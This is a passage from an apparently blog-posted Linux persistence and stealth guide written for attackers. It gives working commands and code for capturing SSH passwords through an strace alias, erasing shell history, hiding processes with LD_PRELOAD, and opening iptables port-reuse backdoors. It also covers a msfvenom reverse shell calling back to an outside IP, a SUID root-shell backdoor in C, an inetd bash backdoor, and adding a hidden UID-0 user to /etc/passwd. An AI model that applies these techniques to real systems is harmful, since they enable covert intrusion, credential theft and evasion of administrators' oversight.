&lt;p&gt;Append to the end of the current user's shell configuration file (e.g. &lt;code&gt;~/.bashrc&lt;/code&gt;). Each outbound &lt;code&gt;ssh&lt;/code&gt; is then run under strace and the password the user types is captured in the read/write trace; the log lands in &lt;code&gt;/tmp&lt;/code&gt; with the user's default umask, and the alias is visible to anyone who runs &lt;code&gt;alias&lt;/code&gt; or reads the rc file.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;alias &lt;/span&gt;&lt;span class="nv"&gt;ssh&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'strace -o /tmp/sshpwd-`date    '&lt;/span&gt;+%d%h%m%s&lt;span class="s1"&gt;'`.log -e read,write,connect  -s2048 ssh'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  OpenSSH Rootkit
&lt;/h4&gt;

&lt;p&gt;This requires environmental dependencies to be installed, making it less practical. For reference, see &lt;a href="https://www.cnblogs.com/bigdevilking/p/9535427.html" rel="noopener noreferrer"&gt;Leveraging OpenSSH Backdoor to Hijack root Password&lt;/a&gt;.&lt;/p&gt;

&lt;h4&gt;
  
  
  SSH Stealth Login
&lt;/h4&gt;

&lt;p&gt;Stealth login allows logging into the system without appearing in the output of commands such as &lt;code&gt;last&lt;/code&gt;, &lt;code&gt;who&lt;/code&gt;, or &lt;code&gt;w&lt;/code&gt;. It works because &lt;code&gt;-T&lt;/code&gt; disables pseudo-terminal allocation, and utmp/wtmp entries are only written when a pty session is opened; sshd still logs the authentication itself to the system journal or &lt;code&gt;auth.log&lt;/code&gt;, so this is not invisible to a host-based review. The &lt;code&gt;UserKnownHostsFile=/dev/null&lt;/code&gt; option only keeps the attacker's own &lt;code&gt;known_hosts&lt;/code&gt; clean.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;ssh &lt;span class="nt"&gt;-T&lt;/span&gt; username@host /bin/bash &lt;span class="nt"&gt;-i&lt;/span&gt;

ssh &lt;span class="nt"&gt;-o&lt;/span&gt; &lt;span class="nv"&gt;UserKnownHostsFile&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;/dev/null &lt;span class="nt"&gt;-T&lt;/span&gt; user@host /bin/bash &lt;span class="nt"&gt;-if&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Linux Hiding Techniques
&lt;/h3&gt;

&lt;h4&gt;
  
  
  Simple File Hiding
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;touch&lt;/span&gt; .excalibra.py
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;One may conceal such files within various directories. Bear in mind that a leading dot only hides a file from a bare &lt;code&gt;ls&lt;/code&gt;; &lt;code&gt;ls -a&lt;/code&gt;, &lt;code&gt;find&lt;/code&gt;, and any file-integrity or EDR tooling still see it.&lt;/p&gt;

&lt;h4&gt;
  
  
  Hidden Permissions
&lt;/h4&gt;

&lt;p&gt;The &lt;code&gt;chattr +i&lt;/code&gt; command sets the immutable attribute, which 'locks' a file so that even root cannot modify, rename or delete it until the attribute is cleared with &lt;code&gt;chattr -i&lt;/code&gt;; we can exploit this to protect a planted file. It requires root (CAP_LINUX_IMMUTABLE), and &lt;code&gt;lsattr&lt;/code&gt; reveals the attribute, so it is also a useful thing for responders to search for.&lt;/p&gt;

&lt;h4&gt;
  
  
  Concealing Command History
&lt;/h4&gt;

&lt;p&gt;After obtaining a shell, enable 'incognito mode' by disabling the command history recording function. This only affects the current bash session; an alternative is &lt;code&gt;unset HISTFILE&lt;/code&gt;, which keeps history in memory but prevents it from being written to disk when the session ends.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;set&lt;/span&gt; +o &lt;span class="nb"&gt;history&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Restore with:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;set&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; &lt;span class="nb"&gt;history&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;history&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Once restored, command history is recorded normally.  &lt;/p&gt;

&lt;h4&gt;
  
  
  Deleting Specific Command History
&lt;/h4&gt;

&lt;p&gt;Delete designated historical records:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sed&lt;/span&gt; &lt;span class="nt"&gt;-i&lt;/span&gt; &lt;span class="s2"&gt;"100,&lt;/span&gt;&lt;span class="nv"&gt;$d&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; .bash_history
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This deletes every line from line 100 to the end of the file.&lt;/p&gt;

&lt;h4&gt;
  
  
  Port Reuse
&lt;/h4&gt;

&lt;h5&gt;
  
  
  Sharing SSH and HTTPS on the Same Port via SSLH
&lt;/h5&gt;

&lt;p&gt;A tool for sharing SSH and HTTPS on the same port on Linux: SSLH&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;Install SSLH
apt &lt;span class="nb"&gt;install &lt;/span&gt;sslh
Configure SSLH
 Edit the SSLH configuration file:
 &lt;span class="nb"&gt;sudo &lt;/span&gt;vi /etc/default/sslh
 1. Locate the line: &lt;span class="nv"&gt;Run&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;no  and change it to: &lt;span class="nv"&gt;Run&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;yes
 &lt;/span&gt;2. Modify the following line to allow SSLH to listen on port 443 on all available interfaces
  &lt;span class="nv"&gt;DAEMON_OPTS&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"--user sslh --listen 0.0.0.0:443 --ssh 127.0.0.1:22 --ssl 127.0.0.1:443 --pidfile /var/run/sslh/sslh.pid"&lt;/span&gt;
  service sslh start
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The test environment is Docker, where port 444 is mapped to the target's port 443.&lt;br&gt;&lt;br&gt;
The test was successful.&lt;/p&gt;
&lt;h5&gt;
  
  
  iptables
&lt;/h5&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Port reuse chain&lt;/span&gt;
iptables &lt;span class="nt"&gt;-t&lt;/span&gt; nat &lt;span class="nt"&gt;-N&lt;/span&gt; LETMEIN
&lt;span class="c"&gt;# Port reuse rule&lt;/span&gt;
iptables &lt;span class="nt"&gt;-t&lt;/span&gt; nat  &lt;span class="nt"&gt;-A&lt;/span&gt; LETMEIN &lt;span class="nt"&gt;-p&lt;/span&gt; tcp &lt;span class="nt"&gt;-j&lt;/span&gt; REDIRECT &lt;span class="nt"&gt;--to-port&lt;/span&gt; 22
&lt;span class="c"&gt;# Activation trigger&lt;/span&gt;
iptables &lt;span class="nt"&gt;-A&lt;/span&gt; INPUT &lt;span class="nt"&gt;-p&lt;/span&gt; tcp &lt;span class="nt"&gt;-m&lt;/span&gt; string &lt;span class="nt"&gt;--string&lt;/span&gt; &lt;span class="s1"&gt;'threathuntercoming'&lt;/span&gt; &lt;span class="nt"&gt;--algo&lt;/span&gt; bm &lt;span class="nt"&gt;-m&lt;/span&gt; recent &lt;span class="nt"&gt;--set&lt;/span&gt; &lt;span class="nt"&gt;--name&lt;/span&gt; letmein &lt;span class="nt"&gt;--rsource&lt;/span&gt; &lt;span class="nt"&gt;-j&lt;/span&gt; ACCEPT
&lt;span class="c"&gt;# Deactivation trigger&lt;/span&gt;
iptables &lt;span class="nt"&gt;-A&lt;/span&gt; INPUT &lt;span class="nt"&gt;-p&lt;/span&gt; tcp &lt;span class="nt"&gt;-m&lt;/span&gt; string &lt;span class="nt"&gt;--string&lt;/span&gt; &lt;span class="s1"&gt;'threathunterleaving'&lt;/span&gt; &lt;span class="nt"&gt;--algo&lt;/span&gt; bm &lt;span class="nt"&gt;-m&lt;/span&gt; recent &lt;span class="nt"&gt;--name&lt;/span&gt; letmein &lt;span class="nt"&gt;--remove&lt;/span&gt; &lt;span class="nt"&gt;-j&lt;/span&gt; ACCEPT
&lt;span class="c"&gt;# let's do it&lt;/span&gt;
iptables &lt;span class="nt"&gt;-t&lt;/span&gt; nat &lt;span class="nt"&gt;-A&lt;/span&gt; PREROUTING &lt;span class="nt"&gt;-p&lt;/span&gt; tcp &lt;span class="nt"&gt;--dport&lt;/span&gt; 80 &lt;span class="nt"&gt;--syn&lt;/span&gt; &lt;span class="nt"&gt;-m&lt;/span&gt; recent &lt;span class="nt"&gt;--rcheck&lt;/span&gt; &lt;span class="nt"&gt;--seconds&lt;/span&gt; 3600 &lt;span class="nt"&gt;--name&lt;/span&gt; letmein &lt;span class="nt"&gt;--rsource&lt;/span&gt; &lt;span class="nt"&gt;-j&lt;/span&gt; LETMEIN
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Exploit:&lt;/p&gt;

&lt;p&gt;Tip for testing with Docker:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;docker run &lt;span class="nt"&gt;-ti&lt;/span&gt; &lt;span class="nt"&gt;--privileged&lt;/span&gt; ubuntu:latest
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;--privileged&lt;/code&gt; flag is required.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Activate reuse&lt;/span&gt;
&lt;span class="nb"&gt;echo &lt;/span&gt;threathuntercoming | socat - tcp:192.168.19.170:80
&lt;span class="c"&gt;# SSH login using port 80&lt;/span&gt;
ssh &lt;span class="nt"&gt;-p&lt;/span&gt; 80 root@192.168.19.170:
&lt;span class="c"&gt;# Deactivate reuse&lt;/span&gt;
&lt;span class="nb"&gt;echo &lt;/span&gt;threathunterleaving | socat - tcp:192.168.19.170:80
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;There also exist ICMP-based exploitation methods. The original article:&lt;br&gt;&lt;br&gt;
&lt;a href="https://www.freebuf.com/articles/network/137683.html" rel="noopener noreferrer"&gt;Remotely Controlling iptables for Port Reuse&lt;/a&gt;&lt;/p&gt;
&lt;h4&gt;
  
  
  Process Hiding
&lt;/h4&gt;
&lt;h5&gt;
  
  
  libprocesshider
&lt;/h5&gt;

&lt;p&gt;A project on GitHub: &lt;a href="https://github.com/gianlucaborello/libprocesshider" rel="noopener noreferrer"&gt;https://github.com/gianlucaborello/libprocesshider&lt;/a&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;Utilise LD_PRELOAD to hijack system functions, as follows:

&lt;span class="c"&gt;# Download and compile the programme&lt;/span&gt;
git clone https://github.com/gianlucaborello/libprocesshider.git
apt-get &lt;span class="nb"&gt;install  &lt;/span&gt;gcc automake autoconf libtool make
&lt;span class="nb"&gt;cd &lt;/span&gt;libprocesshider/ &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; make
&lt;span class="c"&gt;# Move the file to the /usr/local/lib/ directory&lt;/span&gt;
&lt;span class="nb"&gt;cp &lt;/span&gt;libprocesshider.so /usr/local/lib/
&lt;span class="c"&gt;# Load it into the global dynamic linker&lt;/span&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; /usr/local/lib/libprocesshider.so &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; /etc/ld.so.preload
&lt;span class="c"&gt;# Alternatively: export LD_PRELOAD=/usr/local/lib/libprocesshider.so&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The name of the process to hide is configured in the C source file.&lt;/p&gt;

&lt;p&gt;A tool for detecting processes hidden in this way:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;unhide proc
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h5&gt;
  
  
  linux-inject
&lt;/h5&gt;

&lt;p&gt;&lt;code&gt;linux-inject&lt;/code&gt; is a tool for injecting shared objects into Linux processes.&lt;/p&gt;

&lt;p&gt;Project address: &lt;a href="https://github.com/gaffe23/linux-inject.git" rel="noopener noreferrer"&gt;https://github.com/gaffe23/linux-inject.git&lt;/a&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Download and compile the programme&lt;/span&gt;
git clone https://github.com/gaffe23/linux-inject.git
&lt;span class="nb"&gt;cd &lt;/span&gt;linux-inject &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; make
&lt;span class="c"&gt;# Test process&lt;/span&gt;
./sample-target
&lt;span class="c"&gt;# Process injection&lt;/span&gt;
./inject &lt;span class="nt"&gt;-n&lt;/span&gt; sample-target sample-library.so
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;First, compile a custom C file.&lt;br&gt;&lt;br&gt;
Install the dependency packages:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;apt-get purge libc6-dev
&lt;span class="nb"&gt;sudo &lt;/span&gt;apt-get &lt;span class="nb"&gt;install &lt;/span&gt;libc6-dev
&lt;span class="nb"&gt;sudo &lt;/span&gt;apt-get &lt;span class="nb"&gt;install &lt;/span&gt;libc6-dev-i386
&lt;span class="nb"&gt;sudo &lt;/span&gt;apt-get &lt;span class="nb"&gt;install &lt;/span&gt;clang
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;stdio.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;&lt;span class="n"&gt;__attribute__&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="n"&gt;constructor&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;hello&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;    &lt;span class="n"&gt;puts&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Hello world!"&lt;/span&gt;&lt;span class="p"&gt;);}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Generate the .so file:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;gcc &lt;span class="nt"&gt;-shared&lt;/span&gt; &lt;span class="nt"&gt;-fPIC&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; libexcalibra.so hello.c
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol&gt;
&lt;li&gt;&lt;p&gt;First, execute the test file.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Then inject the custom .so file.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Injection successful.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  Vegile
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;Vegile&lt;/code&gt; is a tool for hiding one's own processes; even if the process is killed, it will restart. It relies on the Linux mechanism by which user-specified shared libraries are preloaded before an executable runs; those libraries can override system library functions, which is how the hijacking is achieved.&lt;/p&gt;

&lt;p&gt;First, generate an MSF backdoor:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;msfvenom &lt;span class="nt"&gt;-a&lt;/span&gt; x64 &lt;span class="nt"&gt;--platform&lt;/span&gt; linux &lt;span class="nt"&gt;-p&lt;/span&gt; linux/x64/shell/reverse_tcp &lt;span class="nv"&gt;LHOST&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;149.129.72.186  &lt;span class="nv"&gt;LPORT&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;8000  &lt;span class="nt"&gt;-f&lt;/span&gt; elf &lt;span class="nt"&gt;-o&lt;/span&gt; /var/www/html/Excalibra_Backdoor2
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Set up the MSF listener&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Execute&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;The first method uses process injection; the second ensures that the reverse shell reconnects even if the process is terminated.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Due to dependencies, the second method has a minor bug.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;The test should then succeed.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  Cymothoa
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;Cymothoa&lt;/code&gt; is a lightweight backdoor that also employs process injection.&lt;/p&gt;

&lt;p&gt;Download address: &lt;a href="https://sourceforge.net/projects/cymothoa/files/latest/download" rel="noopener noreferrer"&gt;https://sourceforge.net/projects/cymothoa/files/latest/download&lt;/a&gt;&lt;br&gt;&lt;br&gt;
Compiled binary: &lt;a href="https://github.com/BlackArch/cymothoa-bin" rel="noopener noreferrer"&gt;https://github.com/BlackArch/cymothoa-bin&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Usage:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;./cymothoa &lt;span class="nt"&gt;-S&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This lists the available shellcodes. Only the reverse-shell payload is needed here; option 0 will suffice.&lt;/p&gt;

&lt;p&gt;Find the PID of a bash process, since bash is almost always running.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;./cymothoa &lt;span class="nt"&gt;-p&lt;/span&gt; pid &lt;span class="nt"&gt;-s&lt;/span&gt; 1 &lt;span class="nt"&gt;-y&lt;/span&gt; port
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;It is not very reliable; in my Kali testing it caused the target process to die. It is not recommended for use in live environments.&lt;/p&gt;

&lt;p&gt;If it succeeds, nc can connect directly to the chosen port; whether it works depends on the environment.&lt;/p&gt;

&lt;h3&gt;
  
  
  Setuid and Setgid
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;setuid&lt;/code&gt;: When set on an executable file, it allows the file to execute with the permissions of the file's owner. A typical example is &lt;code&gt;/usr/bin/passwd&lt;/code&gt;. When an ordinary user executes that file, the process runs with root privileges for its duration, which is what enables the user to change their password.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;setgid&lt;/code&gt;: This permission is only effective for directories. When set on a directory, any file created within that directory will have the same group ownership as the directory itself.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;sticky bit&lt;/code&gt;: This bit can be understood as a deletion-prevention bit. Whether a user can delete a file depends mainly on whether the user has write permission on the directory containing it. Without write permission on the directory, no file in it can be deleted and no new file can be added. To allow users to add files but not delete them, the sticky bit can be applied to the directory. Once set, even a user with write permission on the directory cannot delete the file.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;As is well known, Linux file permissions are commonly written in octal form such as 777 or 666. Adding the SUID bit to a file allows it to be run with the privileges of its owner. It is therefore enough to copy the bash binary to another location, give the copy root ownership and the SUID bit, and any user who runs that shell can then execute any file with root privileges.&lt;/p&gt;

&lt;p&gt;Write a simple backdoor in &lt;code&gt;backdoor.c&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;unistd.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;argc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[])&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;setuid&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;setgid&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;argc&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;execl&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"/bin/sh"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"sh"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"-c"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;else&lt;/span&gt;
        &lt;span class="n"&gt;execl&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"/bin/sh"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"sh"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Compile:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;gcc backdoor.c &lt;span class="nt"&gt;-o&lt;/span&gt; backdoor
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cp &lt;/span&gt;backdoor /bin/
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;chmod &lt;/span&gt;u+s /bin/backdoor
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Run &lt;code&gt;backdoor&lt;/code&gt; as an ordinary user.&lt;/p&gt;

&lt;h3&gt;
  
  
  inetd Backdoor
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;inetd&lt;/code&gt; is a daemon that monitors network requests and invokes the corresponding service process to handle the connection request. It can manage connections for multiple services; when &lt;code&gt;inetd&lt;/code&gt; receives a connection, it determines which programme is required, starts the corresponding process, and passes the socket to it (the service socket becomes the programme's standard input, output, and error descriptors).&lt;/p&gt;

&lt;p&gt;Installation:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;apt-get &lt;span class="nb"&gt;install &lt;/span&gt;openbsd-inetd
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Utilise a system-provided service.&lt;/p&gt;

&lt;p&gt;Configure the backdoor:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# vi /etc/inetd.conf    &lt;/span&gt;
fido  stream tcp nowait  root  /bin/bash bash &lt;span class="nt"&gt;-i&lt;/span&gt; &lt;span class="c"&gt;# When an external request for the service named 'fido' arrives, a shell is spawned&lt;/span&gt;

inetd
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then connect via nc.&lt;/p&gt;

&lt;p&gt;Reference: &lt;a href="https://klionsec.github.io/2017/10/23/inetd-backdoor/" rel="noopener noreferrer"&gt;Brief Analysis and Exploitation of inetd Backdoor&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Adding a Backdoor User
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;Generate password
perl &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="s1"&gt;'print crypt("excalibra", "AA"). "\n"'&lt;/span&gt;
Directly append to passwd
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"weblogic1:AAyx65VrBb.fI:0:0:root:/root:/bin/bash"&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt;/etc/passwd
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is easy to detect (an extra UID-0 entry in &lt;code&gt;/etc/passwd&lt;/code&gt; stands out); using an SSH key instead is preferable.&lt;/p&gt;

&lt;h3&gt;
  
  
  ICMP Backdoor
&lt;/h3&gt;

&lt;p&gt;Project address: &lt;a href="https://github.com/andreafabrizi/prism" rel="noopener noreferrer"&gt;https://github.com/andreafabrizi/prism&lt;/a&gt;&lt;br&gt;&lt;br&gt;
Compilation:&lt;/p&gt;

&lt;p&gt;For the Android platform:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;apt-get &lt;span class="nb"&gt;install &lt;/span&gt;gcc-arm-linux-gnueabi
arm-linux-gnueabi-gcc &lt;span class="nt"&gt;-DSTATIC&lt;/span&gt; &lt;span class="nt"&gt;-DDETACH&lt;/span&gt; &lt;span class="nt"&gt;-DNORENAME&lt;/span&gt; &lt;span class="nt"&gt;-static&lt;/span&gt; &lt;span class="nt"&gt;-march&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;armv5 prism.c &lt;span class="nt"&gt;-o&lt;/span&gt; prism
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For Linux 64-bit:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;apt-get &lt;span class="nb"&gt;install &lt;/span&gt;libc6-dev-amd64
gcc &lt;span class="nt"&gt;-DDETACH&lt;/span&gt; &lt;span class="nt"&gt;-m64&lt;/span&gt; &lt;span class="nt"&gt;-Wall&lt;/span&gt; &lt;span class="nt"&gt;-s&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; prism prism.c
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For Linux 32-bit:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;apt-get &lt;span class="nb"&gt;install &lt;/span&gt;libc6-dev-i386
